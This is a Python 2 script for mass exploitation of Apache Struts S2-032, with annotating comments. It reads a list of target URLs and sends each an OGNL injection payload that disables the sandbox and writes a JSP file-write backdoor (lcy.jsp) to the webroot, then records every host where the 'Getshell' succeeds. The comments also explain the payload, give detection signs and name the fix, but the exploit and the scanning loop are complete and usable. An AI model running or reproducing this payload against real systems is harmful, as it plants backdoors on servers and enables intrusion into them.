Struts S2-032
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2016-04-26 17:38:52
# @Last Modified by: Lcy
# @Last Modified time: 2016-04-26 18:20:45
import requests
import sys

# Flat script: reads base URLs (one per line) from the file named on the
# command line, appends the S2-032 query string below to each one, and
# records the hosts whose response echoes the dropped file name. The paste
# lost its indentation; the layout below is the only one the statements
# admit (Python 2 print statements, so it does not run under Python 3).
if len(sys.argv) < 2:
    print "Example: python exp.py list.txt"
    exit()

weblist = sys.argv[1]

# S2-032 query string: an OGNL expression carried in the `method:` action
# prefix (Dynamic Method Invocation). Read left to right it replaces the
# OGNL sandbox with DEFAULT_MEMBER_ACCESS, fetches the servlet request and
# response objects from the action context using the class names passed in
# `reqobj`/`rpsobj`, resolves getRealPath("/") + "lcy.jsp" under the
# webroot, writes the `content` parameter there with java.io.FileOutputStream,
# and prints the resulting path into the response body. `content` is a
# small JSP whose form (`act=yoco`, fields `url`/`smart`) writes an
# arbitrary file on the server, i.e. a file-drop backdoor.
# The `[email]...[/email]` span is forum BBCode auto-link damage from the
# paste, not part of the original query string.
# Detection: a `method:` query parameter combined with `#_memberAccess` /
# `ognl` tokens in access logs; new .jsp files appearing under the webroot;
# responses that echo a filesystem path. Mitigation: upgrade Struts past
# S2-032 and keep struts.enable.DynamicMethodInvocation=false.
payload = "?method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=lcy.jsp&content=%3C%25@%20page%20language%3D%22java%22%20pageEncoding%3D%22gbk%22%25%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.File%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.OutputStream%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.FileOutputStream%22%2f%3E%3C%25%20int%20i%3D0%3BString%20method%3Drequest.getParameter%28%22act%22%29%3Bif%28method%21%3Dnull%26%26method.equals%28%22yoco%22%29%29%7BString%20url%3Drequest.getParameter%28%22url%22%29%3BString%20text%3Drequest.getParameter%28%22smart%22%29%3BFile%20f%3Dnew%20File%28url%29%3Bif%28f.exists%28%29%29%7Bf.delete%28%29%3B%7Dtry%7BOutputStream%20o%3Dnew%20FileOutputStream%28f%29%3Bo.write%28text.getBytes%28%29%29%3Bo.close%28%29%3B%7Dcatch%28Exception%20e%29%7Bi%2b%2b%3B%25%3E0%3C%25%7D%7Dif%28i%3D%3D0%29%7B%25%3E1%3C%25%7D%25%3E%3Cform%20action%3D%27%3Fact%3Dyoco%27%20method%3D%27post%27%3E%3Cinput%20size%3D%22100%22%20value%3D%22%3C%25%3Dapplication.getRealPath%28%22%2f%22%29%20%25%3E%22%20name%3D%22url%22%3E%3Cbr%3E%3Ctextarea%20rows%3D%2220%22%20cols%3D%2280%22%20name%3D%22smart%22%3E"

# The list file is opened without a context manager and never closed.
f = open(weblist)
for l in f.readlines():
    url = l.strip() + payload
    try:
        r = requests.get(url,timeout=5)
        res = r.text
        # Success indicator: the println in the OGNL expression echoes the
        # written path, so the file name shows up in the body. Nothing else
        # is verified, so a page that merely reflects the query string is
        # counted too.
        if "lcy.jsp" in res:
            # NOTE: rebinds `f` (the list file handle) to result.txt and
            # closes neither; readlines() already materialized the list,
            # so the loop still completes.
            f = open("result.txt","a")
            f.write(l.strip() + payload + "\r\n\r\n")
            print "\n %s Getshell Success!" % l.strip(),
    except:
        # Bare except: timeouts, connection errors and every other failure
        # are dropped silently, so unreachable hosts leave no trace.
        pass